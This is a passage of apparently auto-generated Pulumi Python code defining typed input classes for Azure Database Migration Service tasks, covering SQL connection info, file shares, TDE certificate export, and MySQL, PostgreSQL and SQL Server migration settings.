:param pulumi.Input['ConnectToTargetSqlSqlDbSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.SqlDb.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.SqlDb.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetSqlSqlDbSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetSqlSqlDbSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class DatabaseInfoArgs:
def __init__(__self__, *,
source_database_name: pulumi.Input[str]):
"""
Project Database Details
:param pulumi.Input[str] source_database_name: Name of the database
"""
pulumi.set(__self__, "source_database_name", source_database_name)
@property
@pulumi.getter(name="sourceDatabaseName")
def source_database_name(self) -> pulumi.Input[str]:
"""
Name of the database
"""
return pulumi.get(self, "source_database_name")
@source_database_name.setter
def source_database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "source_database_name", value)
@pulumi.input_type
class FileShareArgs:
def __init__(__self__, *,
path: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
File share information with Path, Username, and Password.
:param pulumi.Input[str] path: The folder path for this share.
:param pulumi.Input[str] password: Password credential used to connect to the share location.
:param pulumi.Input[str] user_name: User name credential to connect to the share location
"""
pulumi.set(__self__, "path", path)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def path(self) -> pulumi.Input[str]:
"""
The folder path for this share.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: pulumi.Input[str]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential used to connect to the share location.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name credential to connect to the share location
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class GetTdeCertificatesSqlTaskInputArgs:
def __init__(__self__, *,
backup_file_share: pulumi.Input['FileShareArgs'],
connection_info: pulumi.Input['SqlConnectionInfoArgs'],
selected_certificates: pulumi.Input[Sequence[pulumi.Input['SelectedCertificateInputArgs']]]):
"""
Input for the task that gets TDE certificates in Base64 encoded format.
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for file share to be used for temporarily storing files.
:param pulumi.Input['SqlConnectionInfoArgs'] connection_info: Connection information for SQL Server
:param pulumi.Input[Sequence[pulumi.Input['SelectedCertificateInputArgs']]] selected_certificates: List containing certificate names and corresponding password to use for encrypting the exported certificate.
"""
pulumi.set(__self__, "backup_file_share", backup_file_share)
pulumi.set(__self__, "connection_info", connection_info)
pulumi.set(__self__, "selected_certificates", selected_certificates)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> pulumi.Input['FileShareArgs']:
"""
Backup file share information for file share to be used for temporarily storing files.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: pulumi.Input['FileShareArgs']):
pulumi.set(self, "backup_file_share", value)
@property
@pulumi.getter(name="connectionInfo")
def connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for SQL Server
"""
return pulumi.get(self, "connection_info")
@connection_info.setter
def connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "connection_info", value)
@property
@pulumi.getter(name="selectedCertificates")
def selected_certificates(self) -> pulumi.Input[Sequence[pulumi.Input['SelectedCertificateInputArgs']]]:
"""
List containing certificate names and corresponding password to use for encrypting the exported certificate.
"""
return pulumi.get(self, "selected_certificates")
@selected_certificates.setter
def selected_certificates(self, value: pulumi.Input[Sequence[pulumi.Input['SelectedCertificateInputArgs']]]):
pulumi.set(self, "selected_certificates", value)
@pulumi.input_type
class GetTdeCertificatesSqlTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['GetTdeCertificatesSqlTaskInputArgs']] = None):
"""
Properties for the task that gets TDE certificates in Base64 encoded format.
:param pulumi.Input[str] task_type: Task type.
Expected value is 'GetTDECertificates.Sql'.
:param pulumi.Input['GetTdeCertificatesSqlTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'GetTDECertificates.Sql')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'GetTDECertificates.Sql'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['GetTdeCertificatesSqlTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['GetTdeCertificatesSqlTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class GetUserTablesSqlSyncTaskInputArgs:
def __init__(__self__, *,
selected_source_databases: pulumi.Input[Sequence[pulumi.Input[str]]],
selected_target_databases: pulumi.Input[Sequence[pulumi.Input[str]]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for the task that collects user tables for the given list of databases
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_source_databases: List of source database names to collect tables for
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_target_databases: List of target database names to collect tables for
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for SQL Server
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Connection information for SQL DB
"""
pulumi.set(__self__, "selected_source_databases", selected_source_databases)
pulumi.set(__self__, "selected_target_databases", selected_target_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="selectedSourceDatabases")
def selected_source_databases(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
List of source database names to collect tables for
"""
return pulumi.get(self, "selected_source_databases")
@selected_source_databases.setter
def selected_source_databases(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "selected_source_databases", value)
@property
@pulumi.getter(name="selectedTargetDatabases")
def selected_target_databases(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
List of target database names to collect tables for
"""
return pulumi.get(self, "selected_target_databases")
@selected_target_databases.setter
def selected_target_databases(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "selected_target_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for SQL DB
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class GetUserTablesSqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['GetUserTablesSqlSyncTaskInputArgs']] = None):
"""
Properties for the task that collects user tables for the given list of databases
:param pulumi.Input[str] task_type: Task type.
Expected value is 'GetUserTables.AzureSqlDb.Sync'.
:param pulumi.Input['GetUserTablesSqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'GetUserTables.AzureSqlDb.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'GetUserTables.AzureSqlDb.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['GetUserTablesSqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['GetUserTablesSqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class GetUserTablesSqlTaskInputArgs:
def __init__(__self__, *,
connection_info: pulumi.Input['SqlConnectionInfoArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input[str]]]):
"""
Input for the task that collects user tables for the given list of databases
:param pulumi.Input['SqlConnectionInfoArgs'] connection_info: Connection information for SQL Server
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_databases: List of database names to collect tables for
"""
pulumi.set(__self__, "connection_info", connection_info)
pulumi.set(__self__, "selected_databases", selected_databases)
@property
@pulumi.getter(name="connectionInfo")
def connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for SQL Server
"""
return pulumi.get(self, "connection_info")
@connection_info.setter
def connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "connection_info", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
List of database names to collect tables for
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "selected_databases", value)
@pulumi.input_type
class GetUserTablesSqlTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['GetUserTablesSqlTaskInputArgs']] = None):
"""
Properties for the task that collects user tables for the given list of databases
:param pulumi.Input[str] task_type: Task type.
Expected value is 'GetUserTables.Sql'.
:param pulumi.Input['GetUserTablesSqlTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'GetUserTables.Sql')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'GetUserTables.Sql'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['GetUserTablesSqlTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['GetUserTablesSqlTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MiSqlConnectionInfoArgs:
def __init__(__self__, *,
managed_instance_resource_id: pulumi.Input[str],
type: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
Properties required to create a connection to Azure SQL database Managed instance
:param pulumi.Input[str] managed_instance_resource_id: Resource id for Azure SQL database Managed instance
:param pulumi.Input[str] type: Type of connection info
Expected value is 'MiSqlConnectionInfo'.
:param pulumi.Input[str] password: Password credential.
:param pulumi.Input[str] user_name: User name
"""
pulumi.set(__self__, "managed_instance_resource_id", managed_instance_resource_id)
pulumi.set(__self__, "type", 'MiSqlConnectionInfo')
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="managedInstanceResourceId")
def managed_instance_resource_id(self) -> pulumi.Input[str]:
"""
Resource id for Azure SQL database Managed instance
"""
return pulumi.get(self, "managed_instance_resource_id")
@managed_instance_resource_id.setter
def managed_instance_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "managed_instance_resource_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of connection info
Expected value is 'MiSqlConnectionInfo'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs:
def __init__(__self__, *,
migration_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
source_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_database_name: Optional[pulumi.Input[str]] = None,
target_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Database specific information for MySQL to Azure Database for MySQL migration task inputs
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] migration_setting: Migration settings which tune the migration behavior
:param pulumi.Input[str] name: Name of the database
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] source_setting: Source settings to tune source endpoint migration behavior
:param pulumi.Input[str] target_database_name: Name of target database. Note: Target database will be truncated before starting migration.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] target_setting: Target settings to tune target endpoint migration behavior
"""
if migration_setting is not None:
pulumi.set(__self__, "migration_setting", migration_setting)
if name is not None:
pulumi.set(__self__, "name", name)
if source_setting is not None:
pulumi.set(__self__, "source_setting", source_setting)
if target_database_name is not None:
pulumi.set(__self__, "target_database_name", target_database_name)
if target_setting is not None:
pulumi.set(__self__, "target_setting", target_setting)
@property
@pulumi.getter(name="migrationSetting")
def migration_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Migration settings which tune the migration behavior
"""
return pulumi.get(self, "migration_setting")
@migration_setting.setter
def migration_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "migration_setting", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="sourceSetting")
def source_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Source settings to tune source endpoint migration behavior
"""
return pulumi.get(self, "source_setting")
@source_setting.setter
def source_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "source_setting", value)
@property
@pulumi.getter(name="targetDatabaseName")
def target_database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of target database. Note: Target database will be truncated before starting migration.
"""
return pulumi.get(self, "target_database_name")
@target_database_name.setter
def target_database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_database_name", value)
@property
@pulumi.getter(name="targetSetting")
def target_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Target settings to tune target endpoint migration behavior
"""
return pulumi.get(self, "target_setting")
@target_setting.setter
def target_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "target_setting", value)
@pulumi.input_type
class MigrateMySqlAzureDbForMySqlSyncTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs']]],
source_connection_info: pulumi.Input['MySqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['MySqlConnectionInfoArgs']):
"""
Input for the task that migrates MySQL databases to Azure Database for MySQL for online migrations
:param pulumi.Input[Sequence[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['MySqlConnectionInfoArgs'] source_connection_info: Connection information for source MySQL
:param pulumi.Input['MySqlConnectionInfoArgs'] target_connection_info: Connection information for target Azure Database for MySQL
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['MySqlConnectionInfoArgs']:
"""
Connection information for source MySQL
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['MySqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MySqlConnectionInfoArgs']:
"""
Connection information for target Azure Database for MySQL
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MySqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class MigrateMySqlAzureDbForMySqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncTaskInputArgs']] = None):
"""
Properties for the task that migrates MySQL databases to Azure Database for MySQL for online migrations
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.MySql.AzureDbForMySql.Sync'.
:param pulumi.Input['MigrateMySqlAzureDbForMySqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.MySql.AzureDbForMySql.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.MySql.AzureDbForMySql.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs:
def __init__(__self__, *,
migration_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
source_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_database_name: Optional[pulumi.Input[str]] = None,
target_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Database specific information for PostgreSQL to Azure Database for PostgreSQL migration task inputs
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] migration_setting: Migration settings which tune the migration behavior
:param pulumi.Input[str] name: Name of the database
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] source_setting: Source settings to tune source endpoint migration behavior
:param pulumi.Input[str] target_database_name: Name of target database. Note: Target database will be truncated before starting migration.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] target_setting: Target settings to tune target endpoint migration behavior
"""
if migration_setting is not None:
pulumi.set(__self__, "migration_setting", migration_setting)
if name is not None:
pulumi.set(__self__, "name", name)
if source_setting is not None:
pulumi.set(__self__, "source_setting", source_setting)
if target_database_name is not None:
pulumi.set(__self__, "target_database_name", target_database_name)
if target_setting is not None:
pulumi.set(__self__, "target_setting", target_setting)
@property
@pulumi.getter(name="migrationSetting")
def migration_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Migration settings which tune the migration behavior
"""
return pulumi.get(self, "migration_setting")
@migration_setting.setter
def migration_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "migration_setting", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="sourceSetting")
def source_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Source settings to tune source endpoint migration behavior
"""
return pulumi.get(self, "source_setting")
@source_setting.setter
def source_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "source_setting", value)
@property
@pulumi.getter(name="targetDatabaseName")
def target_database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of target database. Note: Target database will be truncated before starting migration.
"""
return pulumi.get(self, "target_database_name")
@target_database_name.setter
def target_database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_database_name", value)
@property
@pulumi.getter(name="targetSetting")
def target_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Target settings to tune target endpoint migration behavior
"""
return pulumi.get(self, "target_setting")
@target_setting.setter
def target_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "target_setting", value)
@pulumi.input_type
class MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs']]],
source_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs']):
"""
Input for the task that migrates PostgreSQL databases to Azure Database for PostgreSQL for online migrations
:param pulumi.Input[Sequence[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] source_connection_info: Connection information for source PostgreSQL
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] target_connection_info: Connection information for target Azure Database for PostgreSQL
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for source PostgreSQL
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for target Azure Database for PostgreSQL
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class MigratePostgreSqlAzureDbForPostgreSqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs']] = None):
"""
Properties for the task that migrates PostgreSQL databases to Azure Database for PostgreSQL for online migrations
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.PostgreSql.AzureDbForPostgreSql.Sync'.
:param pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.PostgreSql.AzureDbForPostgreSql.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.PostgreSql.AzureDbForPostgreSql.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrateSqlServerSqlDbDatabaseInputArgs:
def __init__(__self__, *,
make_source_db_read_only: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
table_map: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_database_name: Optional[pulumi.Input[str]] = None):
"""
Database specific information for SQL to Azure SQL DB migration task inputs
:param pulumi.Input[bool] make_source_db_read_only: Whether to set database read only before migration
:param pulumi.Input[str] name: Name of the database
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] table_map: Mapping of source to target tables
:param pulumi.Input[str] target_database_name: Name of target database. Note: Target database will be truncated before starting migration.
"""
if make_source_db_read_only is not None:
pulumi.set(__self__, "make_source_db_read_only", make_source_db_read_only)
if name is not None:
pulumi.set(__self__, "name", name)
if table_map is not None:
pulumi.set(__self__, "table_map", table_map)
if target_database_name is not None:
pulumi.set(__self__, "target_database_name", target_database_name)
@property
@pulumi.getter(name="makeSourceDbReadOnly")
def make_source_db_read_only(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to set database read only before migration
"""
return pulumi.get(self, "make_source_db_read_only")
@make_source_db_read_only.setter
def make_source_db_read_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "make_source_db_read_only", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="tableMap")
def table_map(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Mapping of source to target tables
"""
return pulumi.get(self, "table_map")
@table_map.setter
def table_map(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "table_map", value)
@property
@pulumi.getter(name="targetDatabaseName")
def target_database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of target database. Note: Target database will be truncated before starting migration.
"""
return pulumi.get(self, "target_database_name")
@target_database_name.setter
def target_database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_database_name", value)
@pulumi.input_type
class MigrateSqlServerSqlDbSyncDatabaseInputArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
migration_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
schema_name: Optional[pulumi.Input[str]] = None,
source_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
table_map: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_database_name: Optional[pulumi.Input[str]] = None,
target_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Database specific information for SQL to Azure SQL DB sync migration task inputs
:param pulumi.Input[str] id: Unique identifier for database
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] migration_setting: Migration settings which tune the migration behavior
:param pulumi.Input[str] name: Name of database
:param pulumi.Input[str] schema_name: Schema name to be migrated
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] source_setting: Source settings to tune source endpoint migration behavior
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] table_map: Mapping of source to target tables
:param pulumi.Input[str] target_database_name: Target database name
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] target_setting: Target settings to tune target endpoint migration behavior
"""
if id is not None:
pulumi.set(__self__, "id", id)
if migration_setting is not None:
pulumi.set(__self__, "migration_setting", migration_setting)
if name is not None:
pulumi.set(__self__, "name", name)
if schema_name is not None:
pulumi.set(__self__, "schema_name", schema_name)
if source_setting is not None:
pulumi.set(__self__, "source_setting", source_setting)
if table_map is not None:
pulumi.set(__self__, "table_map", table_map)
if target_database_name is not None:
pulumi.set(__self__, "target_database_name", target_database_name)
if target_setting is not None:
pulumi.set(__self__, "target_setting", target_setting)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Unique identifier for database
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="migrationSetting")
def migration_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Migration settings which tune the migration behavior
"""
return pulumi.get(self, "migration_setting")
@migration_setting.setter
